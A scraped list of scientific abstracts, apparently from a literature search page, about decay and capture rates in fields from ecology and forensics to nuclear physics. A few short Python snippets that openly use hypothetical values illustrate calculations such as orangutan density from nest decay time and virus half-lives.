Virola koschnyi plantations decayed very slowly (k = 0.29 ± 0.15 year^-1); those of Vochysia guatemalensis decayed seven times faster (k = 2.00 ± 0.13 year^-1). Decay rates of the remaining two species, Hieronyma alchorneoides and Pentaclethra macroloba, were 1.36 and 1.28 year^-1, respectively. We found a positive, marginally significant correlation between fine root decay rates and the relative growth rates of live fine roots (R = 0.93, n = 4, P = 0.072). There was a highly significant negative correlation between fine root decay and fine root lignin:N (R = 0.99, P = 0.01), which supports the use of lignin:N as a decay-controlling factor within terrestrial ecosystem models. The decay rates that we observed in this single study location encompassed the entire range of fine root decay rates previously observed in moist tropical forests, and thus suggest great potential for individual tree species to alter belowground organic matter and nutrient dynamics within a biotically rich rainforest environment. 11. Magnetic Flux Emergence and Decay Rates for Preceder and Follower Sunspots Observed with HMI Norton, A. A.; Jones, E. H.; Linton, M. G.; Leake, J. E. 2017-06-01 We quantify the emergence and decay rates of preceder (p) and follower (f) sunspots within 10 active regions from 2010 to 2014 using Space-weather Helioseismic Magnetic Imager Active Region Patch data. The sunspots are small to mid-sized regions and contain a signed flux within a single polarity sunspot of (1.1–6.5)×10^21 Mx.
The net unsigned flux within the regions, including plage, ranges from (5.1–20)×10^21 Mx. Rates are calculated with and without intensity contours to differentiate between sunspot formation and flux emergence. Signed flux emergence rates, calculated with intensity contours, for the p (f) spots average 6.8 (4.9)×10^19 Mx hr^-1, while decay rates are -1.9 (-3.4)×10^19 Mx hr^-1. The mean signed flux emergence rate of the regions, including plage, is 7.1×10^19 Mx hr^-1, for a mean peak flux of 5.9×10^21 Mx. Using a synthesis of these results and others reported previously, there is a clear trend for larger flux regions to emerge faster than smaller ones. Observed emergence rates (dφ/dt, Mx hr^-1) scale with the total signed peak flux, φ_max, as a power law with an exponent of 0.36, i.e., dφ/dt = A φ_max^0.36. The observed rates may assist in constraining the boundary and initial conditions in simulations, which already demonstrate increased rates for flux tubes with higher buoyancy and twist, or in the presence of a strong upflow. Overall, the observed emergence rates are smaller than those in simulations, which may indicate a slower rise of the flux in the interior than what is captured in simulations. 12. Formation and decay of C60^- following free electron capture by C60 Matejčik, Štefan; Märk, Tilmann D.; Španěl, Patrik; Smith, David; Jaffke, Thomas; Illenberger, Eugen 1995-02-01 The results of a detailed crossed electron/molecular beam study of electron attachment to C60 molecules and electron detachment from C60^- over the range of electron energies from near zero to about 15 eV are described. It is shown by comparing the experimental data for the attachment cross sections (normalized to the absolute thermal cross sections determined using the flowing afterglow/Langmuir probe apparatus) with quantum calculations that attachment occurs at low energies in the p-wave channel, and in the d- and f-wave channels (and probably higher-order partial waves) at the higher electron energies. At electron energies above 7 eV, thermal detachment of electrons from the hot C60^- negative ions is seen to occur, and the unimolecular rate coefficients for detachment, kd, have been determined as a function of the energy of the attaching electron. Hence, by relating kd to the derived temperature of the hot C60^- ions, the electron detachment energy, Ed, has been determined as 2.6 eV, which is close to the electron affinity of C60 as measured by photodetachment from cold C60^- ions. Additionally, by combining the measured attachment rate coefficients, ka, from the previous flowing afterglow/Langmuir probe study with the kd data determined in this study, equilibrium constants for the detachment/attachment reactions have been obtained which are reconciled with those calculated using total partition functions. An important conclusion to be drawn from all these studies is that C60 very efficiently captures electrons over the wide electron energy range from about 0.2 eV to around 15 eV and retains them if the energy released in the electron capture process can be removed before thermal detachment can occur. 13. 12C(16O,γ)28Si radiative capture: Structural and statistical aspects of the γ decay Lebhertz, D.; Courtin, S.; Haas, F.; Jenkins, D. G.; Simenel, C.; Salsac, M.-D.; Hutcheon, D. A.; Beck, C.; Cseh, J.; Darai, J.; Davis, C.; Glover, R. G.; Goasduff, A.; Kent, P. E.; Levai, G.; Marley, P. L.; Michalon, A.; Pearson, J. E.; Rousseau, M.; Rowley, N.; Ruiz, C.
2012-03-01 The heavy-ion radiative capture reaction 12C(16O,γ)28Si has been studied at three energies Ec.m.=8.5, 8.8, and 9 MeV which are close to the Coulomb barrier. The weak radiative capture process has been identified by measuring the 28Si recoils in the highly selective 0∘ spectrometer DRAGON at TRIUMF (Vancouver). The coincident γ rays have been recorded in the associated BGO array. This has allowed a complete measurement of the γ spectrum and the relative strength of all decay pathways. An important part of the decay through quasibound states close to the particle threshold and the feeding of bound states with particular deformation have been identified for the first time. Comparisons with Monte Carlo simulations allowed the extraction of the full experimental radiative capture cross section. Our results suggest an important contribution of spins Jπ=5- and 6+ in the entrance channel. The surprisingly large cross sections from 12 μb at Ec.m.=8.5 MeV to 25 μb at Ec.m.=9.0 MeV for the heavy-ion radiative capture process are discussed in terms of the interplay between statistical and structural aspects of the process. 14. Decay rates of human remains in an arid environment. PubMed Galloway, A; Birkby, W H; Jones, A M; Henry, T E; Parks, B O 1989-05-01 The environment of southern Arizona with mild winters and hot, dry summers produces great variability in decay rates of human remains. Summer temperatures, which range well over 38 degrees C (100 degrees F), induce rapid bloating as a result of the accumulation of decompositional gases. However, in certain circumstances, the aridity can lead to extensive mummification, allowing preservation of remains for hundreds of years. A retrospective study of 189 cases, concentrating on remains found on the desert floor or in the surrounding mountains and on remains found within closed structures, outlines the time frame and sequences of the decay process. Remains can retain a fresh appearance for a considerable time in the winter, but the onset of marked decomposition is rapid in the summer months. Bloating of the body usually is present two to seven days following death. Following this, within structures, there is frequently rapid decomposition and skeletonization. With outdoor exposure, remains are more likely to pass through a long period of dehydration of outer tissues, mummification, and reduction of desiccated tissue. Exposure of large portions of the skeleton usually does not occur until four to six months after death. Bleaching and exfoliation of bone--the beginning stages of destruction of the skeletal elements--begins at about nine months' exposure. Insect activity, including that of maggot and beetle varieties, may accelerate decomposition, but this process is greatly affected by location of the body, seasonal weather, and accessibility of the soft tissues. Carnivores and other scavengers also are contributing factors, as are clothing or covering of the body, substrate, elevation, and latitude. 15. Accumulation and decay of visual capture and the ventriloquism aftereffect caused by brief audio-visual disparities. PubMed Bosen, Adam K; Fleming, Justin T; Allen, Paul D; O'Neill, William E; Paige, Gary D 2017-02-01 Visual capture and the ventriloquism aftereffect resolve spatial disparities of incongruent auditory visual (AV) objects by shifting auditory spatial perception to align with vision. Here, we demonstrated the distinct temporal characteristics of visual capture and the ventriloquism aftereffect in response to brief AV disparities. 
In a set of experiments, subjects localized either the auditory component of AV targets (A within AV) or a second sound presented at varying delays (1-20 s) after AV exposure (A2 after AV). AV targets were trains of brief presentations (1 or 20), covering a ±30° azimuthal range, and with ±8° (R or L) disparity. We found that the magnitude of visual capture generally reached its peak within a single AV pair and did not dissipate with time, while the ventriloquism aftereffect accumulated with repetitions of AV pairs and dissipated with time. Additionally, the magnitude of the auditory shift induced by each phenomenon was uncorrelated across listeners and visual capture was unaffected by subsequent auditory targets, indicating that visual capture and the ventriloquism aftereffect are separate mechanisms with distinct effects on auditory spatial perception. Our results indicate that visual capture is a 'sample-and-hold' process that binds related objects and stores the combined percept in memory, whereas the ventriloquism aftereffect is a 'leaky integrator' process that accumulates with experience and decays with time to compensate for cross-modal disparities. 16. Time-Modulation of Orbital Electron Capture Decays by Mixing of Massive Neutrinos Sms Collaboration; Kienle, P.; SMS Collaboration 2009-08-01 We report on the observation of time-modulated orbital EC decays of H-like 140Pr58+, 142Pm60+, and 122I52+ (preliminary) ions with only one electron in the K-shell coasting in the ESR storage ring of GSI with a velocity β=0.71 and a spread Δv/v˜5×10. The decays were observed with time resolved single ion Schottky Mass Spectroscopy by observation of the time of change of the precisely measured revolution frequency of the mother into the daughter ion which is proportional to the mass change or Q-value of the decay. We observed in the EC-branches exponential decay curves time-modulated with periods T=7.06(8)s and amplitude a=0.18(3) for 140Pr decays, T=7.10(22)s and a=0.23(4) for 142Pm decays, and T=6.04(6)s and a=0.19(3) for 122I decays (preliminary) in the laboratory frame. The simultaneously measured β branch of 142Pm shows no modulation with a<0.03. An explanation by mixing of massive electron neutrinos has been suggested, according to which the observed modulation frequency yields a value for the quadratic mass difference: m22-m12=2.22(3)×10eV. This value is 2.9 times larger than the value derived by the KamLAND antineutrino oscillation experiment. 17. Parametric control of collision rates and capture rates in geometrically enhanced differential immunocapture (GEDI) microfluidic devices for rare cell capture PubMed Central Smith, James P.; Lannin, Timothy B.; Syed, Yusef A.; Santana, Steven M.; Kirby, Brian J. 2013-01-01 The enrichment and isolation of rare cells from complex samples, such as circulating tumor cells (CTCs) from whole blood, is an important engineering problem with widespread clinical applications. One approach uses a microfluidic obstacle array with an antibody surface functionalization to both guide cells into contact with the capture surface and to facilitate adhesion; geometrically enhanced differential immunocapture is a design strategy in which the array is designed to promote target cell–obstacle contact and minimize other interactions (Gleghorn et al., 2010; Kirby et al., 2012). 
We present a simulation that uses capture experiments in a simple Hele-Shaw geometry (Santana et al., 2012) to inform a target-cell-specific capture model that can predict capture probability in immunocapture microdevices of arbitrary complex geometry. We show that capture performance is strongly dependent on the array geometry, and that it is possible to select an obstacle array geometry that maximizes capture efficiency (by creating combinations of frequent target cell–obstacle collisions and shear stress low enough to support capture), while simultaneously enhancing purity by minimizing non-specific adhesion of both smaller contaminant cells (with infrequent cell–obstacle collisions) and larger contaminant cells (by focusing those collisions into regions of high shear stress). PMID:24078270 18. Decay rates of spherical and deformed proton emitters SciTech Connect Davids, C. N.; Esbensen, H. 1999-11-23 Using Green's function techniques, the authors derive expressions for the width of a proton-decaying state in spherical and deformed nuclei. The authors show that the proton decay widths calculated by the exact expressions of Maglione et al. are equivalent to the distorted-wave expressions of Bugrov et al., and to that of Åberg et al. in the spherical case. 19. Inferring neutron capture rates of short-lived isotopes Liddick, Sean 2015-04-01 Neutron capture reactions on short-lived nuclei play an important role in astrophysical processes such as the rapid neutron capture process. However, these cross sections are difficult to measure in the laboratory. The so-called beta-Oslo technique has been developed for constraining the neutron capture cross sections of short-lived nuclei by combining beta-delayed gamma-ray spectroscopy and the Oslo method to extract nuclear level densities and gamma-ray strength functions. The two quantities are used within the framework of a Hauser-Feshbach model to constrain the neutron capture cross section. The technique will be described and the inferred neutron capture cross sections for a preliminary set of nuclei presented. The experimental reach of the technique at current facilities and eventually at the upcoming Facility for Rare Isotope Beams (FRIB), as well as the overlap with astrophysical processes, will be discussed. This work was supported by the National Science Foundation under Grants No. PHY 102511, No. PHY 0822648, No. PHY 1350234 and by the Research Council of Norway, Project Grant No. 205528. 20. Evaluating orangutan census techniques using nest decay rates: implications for population estimates. PubMed Mathewson, P D; Spehar, S N; Meijaard, E; Nardiyono; Purnomo; Sasmirul, A; Sudiyanto; Oman; Sulhnudin; Jasary; Jumali; Marshall, A J 2008-01-01 An accurate estimate of orangutan nest decay time is a crucial factor in commonly used methods for estimating orangutan population size. Decay rates are known to vary, but the decay process and, thus, the temporal and spatial variation in decay time are poorly understood. We used established line-transect methodology to survey orangutan nests in a lowland forest in East Kalimantan, Indonesia, and monitored the decay of 663 nests over 20 months. Using Markov chain analysis we calculated a decay time of 602 days, which is significantly longer than times found in other studies.
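Nest decay time enters orangutan density estimates roughly linearly in the denominator: in the widely used nest-count conversion, orangutan density ≈ nest density / (p × r × t), where p is the proportion of nest-building individuals, r the nest production rate, and t the nest decay time. The sketch below only illustrates that inverse scaling, which the recalculation continued below relies on; the nest density, p, r, and the shorter comparison decay time are hypothetical values, not numbers from the study.

```python
# Illustrative nest-to-density conversion: density = nests / (p * r * t)
nest_density = 500.0    # hypothetical nest density [nests / km^2]
p_builders = 0.9        # hypothetical proportion of nest-building individuals
nests_per_day = 1.0     # hypothetical nest production rate [nests / individual / day]

def orangutan_density(decay_time_days):
    """Orangutans per km^2 implied by a given nest decay time."""
    return nest_density / (p_builders * nests_per_day * decay_time_days)

d_long = orangutan_density(602.0)   # decay time estimated in the study above
d_short = orangutan_density(175.0)  # hypothetical shorter literature value
print(f"602-day decay time : {d_long:.2f} ind/km^2")
print(f"175-day decay time : {d_short:.2f} ind/km^2 ({d_short/d_long:.1f}x higher)")
```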
Based on this decay time, we recalculated the orangutan density estimate for a site in East Kalimantan; the resulting density is much lower than previous estimates (previous estimates were 3-8 times higher than our recalculated density). Our data suggest that short-term studies where decay times are determined using matrix mathematics may produce unreliable decay times. Our findings have implications for other parts of the orangutan range where population estimates are based on potentially unreliable nest decay rate estimates, and we recommend that census estimates for various parts of the orangutan range be reexamined. Considering the high variation in decay rates, there is a need to move away from using single-number decay time estimates and, preferably, to test methods that do not rely on nest decay times as alternatives for rapid assessments of orangutan habitat for conservation in Borneo. 1. How to calculate α-decay rates in the future? Carlsson, B. Gillis; Ward, Daniel E.; Åberg, Sven 2016-12-01 New elements discovered during past decades have been created in fusion reactions where a lighter nucleus is collided with a heavier one. The new elements created often decay by emitting α particles. From the half-lives of the decays and the energies of the emitted particles one may extract some properties of the new elements. In this talk the recent work performed by the Lund group to model α decay starting from nuclear density-functional theory is reviewed and a possible extension is mentioned. 2. Enhanced capture rate for haze defects in production wafer inspection Auerbach, Ditza; Shulman, Adi; Rozentsvige, Moshe 2010-03-01 involved scanning with three different recipe types: Standard Inspection: a nominal recipe with a low false alarm rate was used to scan the wafer, and repeaters were extracted from the final defect map. Haze Monitoring Application: recipe sensitivity was enhanced and run on a single field column, from which repeating defects were extracted. Enhanced Repeater Extractor: defect processing included two parallel routes, a nominal recipe for the random defects and the new highly sensitive repeater extractor algorithm. The results showed that the new application (recipe #3) had the highest capture rate on haze defects and detected new repeater defects not found in the first two recipes. In addition, the recipe was much simpler to set up since repeaters are filtered separately from random defects. We expect that in the future, with the advent of mask-less lithography and EUV lithography, the monitoring of field and die repeating defects on the wafer will become a necessity for process control in the semiconductor fab. 3. Complex Degradation Processes Lead to Non-Exponential Decay Patterns and Age-Dependent Decay Rates of Messenger RNA PubMed Central Deneke, Carlus; Lipowsky, Reinhard; Valleriani, Angelo 2013-01-01 4. Electron-capture branch of 100Tc and tests of nuclear wave functions for double-β decays. SciTech Connect Sjue, S. K. L.; Melconian, D.; Garcia, A.; Ahmad, I.; Algora, A.; Aysto, J.; Elomaa, V.-V.; Eronen, T.; Hakala, J.; Hoedl, S.; Kankainen, A.; Kessler, T.; Moore, I. D.; Naabe, F.; Penttila, H.; Rahaman, S.; Saastamoinen, A.; Swanson, H. E.; Weber, C.; Triambak, S.; Deryckx, K.; Physics; Univ. of Washington; Texas A&M Univ.; Univ. of Valencia; Hungarian Academy of Sciences; Univ. of Jyvaskyla; Univ. of Michigan 2008-12-30 We present a measurement of the electron-capture branch of 100Tc.
Our value, B(EC) = (2.6 ± 0.4) × 10^-5, implies that the 100Mo neutrino absorption cross section to the ground state of 100Tc is roughly 50% larger than previously thought. Disagreement between the experimental value and QRPA calculations relevant to double-β decay matrix elements persists. We find agreement with previous measurements of the 539.5- and 590.8-keV γ-ray intensities. 5. Radiative capture studies of the electromagnetic decays of highly excited states SciTech Connect Snover, K.A. 1980-01-01 Selected examples of interesting E1, M1, and E2 resonance studies in (p,γ) and (α,γ) reactions are discussed. These include a unique determination of E1 amplitudes in the 12C(p,γ0)13N reaction, E2 strength in light nuclei, M1 decays to the ground states and to the excited 0+ states of the doubly magic 16O and 40Ca nuclei, second-harmonic E1 resonances in (p,γ), and M1 γ-decay of stretched particle-hole states in 16O and 28Si. 6. On the gauge invariance of the decay rate of false vacuum Endo, Motoi; Moroi, Takeo; Nojiri, Mihoko M.; Shoji, Yutaro 2017-08-01 We study the gauge invariance of the decay rate of the false vacuum for a model in which the scalar field responsible for the false vacuum decay has a gauge quantum number. In order to calculate the decay rate, one should integrate out the field fluctuations around the classical path connecting the false and true vacua (i.e., the so-called bounce). Concentrating on the case where the gauge symmetry is broken in the false vacuum, we show a systematic way to perform such an integration and present a manifestly gauge-invariant formula for the decay rate of the false vacuum. 7. Investigation of photoneutron and capture gamma-ray production in Pb and W under irradiation from 16N decay radiation Kebwaro, Jeremiah Monari; Zhao, Yaolin; He, Chaohui 2015-09-01 Lead and tungsten are potential alternative materials for shielding reactor ex-core components with high 16N activity when available space limits the application of concrete. Since the two materials are vulnerable to photonuclear reactions, the nature and intensity of the secondary radiation resulting from (γ,n) and (n,γ) reactions when 16N decay radiation interacts with these materials need to be well known for effective shielding design. In this study the MCNP code was used to calculate the photoneutron and capture gamma-ray spectra in the two materials when irradiated by 16N decay radiation. It was observed that some of the photoneutrons generated in the two materials lie in the low-energy range, which is considered optimum for (n,γ) reactions. Lead is more transparent to the photoneutrons when compared to tungsten. The calculations also revealed that the bremsstrahlung generated by the beta spectrum was not sufficient to trigger any additional photoneutrons. Both energetic and less energetic capture gamma-rays are observed when photoneutrons interact with nuclei of the two materials. Depending on the strength of the 16N source term, the secondary radiation could affect the effectiveness of the shield and needs to be considered during design. 8. Renormalization-scale uncertainty in the decay rate of false vacuum Endo, Motoi; Moroi, Takeo; Nojiri, Mihoko M.; Shoji, Yutaro 2016-01-01 We study radiative corrections to the decay rate of false vacua, paying particular attention to the renormalization-scale dependence of the decay rate.
The decay rate depends exponentially on the bounce action. The bounce action itself is renormalization-scale dependent. To make the decay rate scale-independent, radiative corrections, which are due to the field fluctuations around the bounce, have to be included. We show quantitatively that the inclusion of the fluctuations suppresses the scale dependence, and hence is important for the precise calculation of the decay rate. We also apply our analysis to a supersymmetric model and show that the radiative corrections are important for the Higgs-stau system with charge-breaking minima. 9. The 2νβ-β- decay rates within Pyatov's restoration method Ünlü, Serdar; Çakmak, Neçla; Selam, Cevad 2017-01-01 We try to give a detailed analysis of the 2νβ-β- decay rates to the final ground states for the decay emitters 70Zn, 80Se, 86Kr, 94Zr, 104Ru, 110Pd, 114Cd and 124Sn. The nucleon-nucleon residual interaction potential is defined according to Pyatov's restoration method. The nuclear matrix element for 2νβ-β- decay is obtained by including the virtual contributions coming from the isobar analogue excitations within the framework of the proton-neutron quasi-particle random phase approximation (pnQRPA). The calculated decay rates are compared with mean-field, schematic-model and other calculations. 10. Search for massive neutrinos in the recoil spectrum of 37Cl following electron capture decay of 37Ar SciTech Connect Hindi, M.M.; Bardayan, D.W.; Kozub, R.L.; Robinson, S.J. 1993-10-01 We are developing an experiment to measure the spectrum of recoil velocities of 37Cl ions following the electron capture (EC) decay of 37Ar. One of the initial aims of this experiment is to search for massive neutrinos (m_ν ~ 200-250 keV) which might be emitted in the decay, with a mixing probability of < 0.3%. A 300 mCi 37Ar source was produced via the 36Ar(n,γ) reaction at the BNL reactor. The gas was bled into an ultra-high-vacuum system at MSU and 1-2 monolayers were adsorbed on a Au-coated Si(111) surface cooled to 20 K. The Auger electrons associated with the EC decay of 37Ar were detected in a Channeltron detector. The recoiling 37Cl ions were detected in a microchannel-plate detector. We are currently preparing a fresh 37Ar sample, and plan to measure the time-of-flight spectrum of the recoils by detecting them in delayed coincidence with the Auger electrons. 11. Estimation of waste component-specific landfill decay rates using laboratory-scale decomposition data. PubMed De la Cruz, Florentino B; Barlaz, Morton A 2010-06-15 The current methane generation model used by the U.S. EPA (Landfill Gas Emissions Model) treats municipal solid waste (MSW) as a homogeneous waste with one decay rate. However, component-specific decay rates are required to evaluate the effects of changes in waste composition on methane generation. Laboratory-scale rate constants, k_lab, for the major biodegradable MSW components were used to derive field-scale decay rates (k_field) for each waste component using the assumption that the average of the field-scale decay rates for each waste component, weighted by its composition, is equal to the bulk MSW decay rate. For an assumed bulk MSW decay rate of 0.04 yr^-1, k_field was estimated to be 0.298, 0.171, 0.015, 0.144, 0.033, 0.02, 0.122, and 0.029 yr^-1 for grass, leaves, branches, food waste, newsprint, corrugated containers, coated paper, and office paper, respectively.
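A minimal sketch of the scaling step just described: field-scale component decay rates are obtained by rescaling the laboratory-scale constants so that their composition-weighted average equals the assumed bulk MSW decay rate of 0.04 yr^-1. The laboratory rate constants and the waste-composition fractions used here are hypothetical placeholders; only the structure of the calculation follows the abstract.

```python
# Hypothetical laboratory-scale decay constants [yr^-1] and waste composition fractions
k_lab = {"grass": 1.2, "leaves": 0.7, "branches": 0.06,
         "food waste": 0.6, "newsprint": 0.13, "corrugated containers": 0.08,
         "coated paper": 0.5, "office paper": 0.12}
composition = {"grass": 0.05, "leaves": 0.04, "branches": 0.03,
               "food waste": 0.21, "newsprint": 0.08, "corrugated containers": 0.20,
               "coated paper": 0.04, "office paper": 0.35}

k_bulk = 0.04  # assumed bulk MSW decay rate [yr^-1]

# Choose a single scale factor so the composition-weighted mean of the
# field-scale constants reproduces the bulk decay rate.
weighted_lab = sum(composition[c] * k_lab[c] for c in k_lab)
scale = k_bulk / weighted_lab
k_field = {c: scale * k for c, k in k_lab.items()}

check = sum(composition[c] * k_field[c] for c in k_field)
print(f"scale factor = {scale:.3f}, weighted k_field = {check:.3f} yr^-1")
```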
The effect of landfill waste diversion programs on methane production was explored to illustrate the use of component-specific decay rates. One hundred percent diversion of yard waste and food waste reduced the year 20 methane production rate by 45%. When a landfill gas collection schedule was introduced, collectable methane was most influenced by food waste diversion at years 10 and 20 and paper diversion at year 40. 12. Long-term measurements of 36Cl to investigate potential solar influence on the decay rate Kossert, Karsten; Nähle, Ole J. 2014-03-01 Recently, Jenkins et al. [6] reported on fluctuations in the detected decay events of 36Cl which were measured with a Geiger-Müller counter. Experimental data of 32Si measured by means of an end-window gas-flow proportional counter at the Brookhaven National Laboratory show similar periodicity, albeit a different amplitude. Jenkins et al. interpret the fluctuations as evidence of solar influence on the decay rates of beta-decaying radionuclides. 13. Mechanisms and Rates of Decay of Marine Viruses in Seawater † PubMed Central Suttle, Curtis A.; Chen, Feng 1992-01-01 Loss rates and loss processes for viruses in coastal seawater from the Gulf of Mexico were estimated with three different marine bacteriophages. Decay rates in the absence of sunlight ranged from 0.009 to 0.028 h-1, with different viruses decaying at different rates. In part, decay was attributed to adsorption by heat-labile particles, since viruses did not decay or decayed very slowly in seawater filtered through a 0.2-μm-pore-size filter (0.2-μm-filtered seawater) and in autoclaved or ultracentrifuged seawater but continued to decay in cyanide-treated seawater. Cyanide did cause decay rates to decrease, however, indicating that biological processes were also involved. The observations that decay rates were often greatly reduced in 0.8- or 1.0-μm-filtered seawater, whereas bacterial numbers were not, suggested that most bacteria were not responsible for the decay. Decay rates were also reduced in 3-μm-filtered or cycloheximide-treated seawater but not in 8-μm-filtered seawater, implying that flagellates consumed viruses. Viruses added to flagellate cultures decayed at 0.15 h-1, corresponding to 3.3 viruses ingested flagellate-1 h-1. Infectivity was very sensitive to solar radiation and, in full sunlight, decay rates were 0.4 to 0.8 h-1. Even when UV-B radiation was blocked, rates were as high as 0.17 h-1. Calculations suggest that in clear oceanic waters exposed to full sunlight, most of the virus decay, averaged over a depth of 200 m, would be attributable to solar radiation. When decay rates were averaged over 24 h for a 10-m coastal water column, loss rates of infectivity attributable to sunlight were similar to those resulting from all other processes combined. Consequently, there should be a strong diel signal in the concentration of infectious viruses. In addition, since sunlight destroys infectivity more quickly than virus particles, a large proportion of the viruses in seawater is probably not infective. Images PMID:16348812 14. The use of decay rates to analyse the performance of railway track in rolling noise generation Jones, C. J. C.; Thompson, D. J.; Diehl, R. J. 2006-06-01 Through the development and testing of theoretical models for rolling noise in the past, it has been well demonstrated that the rate of decay of vibration along the rail is closely linked to the noise performance of the track, since it controls the effective radiating length of the rail. 
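The first-order decay rates quoted in the marine-virus entry above convert directly into more intuitive persistence times: for exponential loss of infectivity, the half-life is ln2/k and the time to lose 90% of infectivity is ln10/k. The sketch below applies those conversions to the range of rates reported there (dark decay 0.009-0.028 h^-1, ~0.17 h^-1 with UV-B blocked, and 0.4-0.8 h^-1 in full sunlight).

```python
import math

# Decay rates of infectivity quoted in the marine-virus abstract above [h^-1]
rates = {"dark, slow": 0.009, "dark, fast": 0.028,
         "UV-B blocked": 0.17, "full sunlight, low": 0.4, "full sunlight, high": 0.8}

for label, k in rates.items():
    t_half = math.log(2) / k    # time for infectivity to halve [h]
    t_90 = math.log(10) / k     # time to lose 90% of infectivity [h]
    print(f"{label:20s} k={k:5.3f} h^-1  t1/2={t_half:6.1f} h  t90={t_90:6.1f} h")
```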
The decay rates of vibration along the rail have long been used by researchers as an intermediate, measurable parameter by which to test and improve the accuracy of prediction models. Recently, it has been suggested that the decay rates should be used as a criterion for the selection of track for noise measurements that are part of the acceptance testing of interoperable trains in Europe. In this context, a more detailed understanding of the factors that affect the measurement of decay rates and a consistent approach to the data processing have become important topics. Here, a method is suggested for the calculation of decay rates from frequency response measurements. Different effects are shown in the measured decay rates of a ballasted track with mono-bloc sleepers, a slab track and a ballasted track with bi-bloc sleepers. In the last case, a model for a periodically supported track is used to study the effects observed. It is shown that a peak in the decay rate just above the pinned-pinned frequency may be overestimated because of the measurement procedure that has been used. 15. The microscopic approach to the rates of radioactive decay by emission of heavy clusters Ivaşcu, M.; Silişteanu, I. 1988-08-01 We have applied a simple microscopic decay theory to the analysis of the rare decay modes. The absolute decay rates are estimated by using the shell model and resonance formation factors and optical model penetrabilities. The resonance formation factors are deduced from the strong interaction form of the theory where the wave function in the internal region is represented in terms of compound nucleus decay. In order to account fully for the data, the implication of internal degrees of freedom was found to be necessary, but no adjustment of Gamow factor was needed. The results have been discussed in the light of the previously reported results and data. 16. Factors influencing the variation in capture rates of shrews in southern California, USA USGS Publications Warehouse Laakkonen, Juha; Fisher, Robert N.; Case, Ted J. 2003-01-01 We examined the temporal variation in capture rates of shrewsNotiosorex crawfordi (Coues, 1877) and Sorex ornatus (Merriam, 1895) in 20 sites representing fragmented and continuous habitats in southern California, USA. InN. crawfordi, the temporal variation was significantly correlated with the mean capture rates. Of the 6 landscape variables analyzed (size of the landscape, size of the sample area, altitude, edge, longitude and latitude), sample area was positively correlated with variation in capture rates ofN. crawfordi. InS. ornatus, longitude was negatively correlated with variation in capture rates. Analysis of the effect of precipitation on the short- and long-term capture rates at 2 of the sites showed no correlation between rainfall and capture rates of shrews even though peak number of shrews at both sites were reached during the year of highest amount of rainfall. A key problem confounding capture rates of shrews in southern California is the low overall abundance of both shrew species in all habitats and seasons. 17. Resonance capture at arbitrary inclination - II. Effect of the radial drift rate Namouni, F.; Morais, M. H. M. 2017-05-01 18. Stability and decay rates of nonisotropic attractive Bose-Einstein condensates SciTech Connect Huepe, C.; Tuckerman, L. S.; Metens, S.; Brachet, M. E. 2003-08-01 Nonisotropic attractive Bose-Einstein condensates are investigated numerically with Newton and inverse Arnoldi methods. 
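For the railway-track entry above, the quantity in question is the track decay rate, commonly estimated from frequency-response measurements at increasing distance along the rail as DR ≈ 4.343 / Σ_n (|A(x_n)|²/|A(x_0)|²) Δx_n dB/m (an EN 15461-style estimate). The sketch below applies that formula to synthetic response magnitudes; the measurement positions and amplitudes are invented for illustration only.

```python
# Synthetic frequency-response magnitudes |A(x_n)| in one frequency band,
# measured at increasing distance x_n [m] along the rail (x[0] is the reference).
x = [0.0, 0.3, 0.6, 1.2, 2.4, 4.8, 9.6]           # hypothetical positions [m]
amp = [1.00, 0.85, 0.72, 0.52, 0.27, 0.08, 0.01]  # hypothetical |A(x_n)|, arbitrary units

# Approximate spacing associated with each measurement position
dx = []
for n in range(len(x)):
    left = x[n] - x[n - 1] if n > 0 else 0.0
    right = x[n + 1] - x[n] if n < len(x) - 1 else x[n] - x[n - 1]
    dx.append(0.5 * (left + right))

# Decay rate estimate: DR = 4.343 / sum(|A_n|^2 / |A_0|^2 * dx_n)  [dB/m]
s = sum((a / amp[0]) ** 2 * d for a, d in zip(amp, dx))
decay_rate = 4.343 / s
print(f"track decay rate ~ {decay_rate:.2f} dB/m")
```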
The stationary solutions of the Gross-Pitaevskii equation and their linear stability are computed. Bifurcation diagrams are calculated and used to find the condensate decay rates corresponding to macroscopic quantum tunneling, two-three-body inelastic collisions, and thermally induced collapse. Isotropic and nonisotropic condensates are compared. The effect of anisotropy on the bifurcation diagram and the decay rates is discussed. Spontaneous isotropization of the condensates is found to occur. The influence of isotropization on the decay rates is characterized near the critical point. 19. Energy decay rate of transmission problem between thermoelasticity of type I and type II Wang, Jing; Han, Zhong-Jie; Xu, Gen-Qi 2017-06-01 In this paper, the energy decay rate of a 1-d mixed type I and type II thermoelastic system is considered. The system consists of two kinds of thermoelastic components. One is the classical thermoelasticity (so-called type I), another one is nonclassical thermoelasticity without dissipation (named type II). These two components are coupled at the interface satisfying certain transmission condition. We prove that the system is lack of uniform exponential decay rate and further obtain the sharp polynomial decay rate by resolvent estimates together with the diagonalization argument in linear algebra. Moreover, we present some numerical simulations to support these theoretical results. 20. Biomass decay rates and tissue nutrient loss in bloom and non-bloom-forming macroalgal species Conover, Jessie; Green, Lindsay A.; Thornber, Carol S. 2016-09-01 Macroalgal blooms occur in shallow, low-wave energy environments and are generally dominated by fast-growing ephemeral macroalgae. When macroalgal mats undergo senescence and decompose they can cause oxygen depletion and release nutrients into the surrounding water. There are relatively few studies that examine macroalgal decomposition rates in areas impacted by macroalgal blooms. Understanding the rate of macroalgal bloom decomposition is essential to understanding the impacts of macroalgal blooms following senescence. Here, we examined the biomass, organic content, nitrogen decay rates and δ15N values for five macroalgal species (the bloom-forming Agardhiella subulata, Gracilaria vermiculophylla, Ulva compressa, and Ulva rigida and the non-bloom-forming Fucus vesiculosus) in Narragansett Bay, Rhode Island, U.S.A. using a litterbag design. Bloom-forming macroalgae had similar biomass decay rates (0.34-0.51 k d-1) and decayed significantly faster than non-bloom-forming macroalgae (0.09 k d-1). Biomass decay rates also varied temporally, with a significant positive correlation between biomass decay rate and water temperature for U. rigida. Tissue organic content decreased over time in all species, although A. subulata and G. vermiculophylla displayed significantly higher rates of organic content decay than U. compressa, U. rigida, and F. vesiculosus. Agardhiella subulata had a significantly higher rate of tissue nitrogen decay (0.35 k d-1) than all other species. By contrast, only the δ15N of F. vesiculosus changed significantly over the decay period. Overall, our results indicate that bloom-forming macroalgal species decay more rapidly than non-bloom-forming species. 1. The anharmonic phonon decay rate in group-III nitrides Srivastava, G. P. 2009-04-01 Measured lifetimes of hot phonons in group-III nitrides have been explained theoretically by considering three-phonon anharmonic interaction processes. 
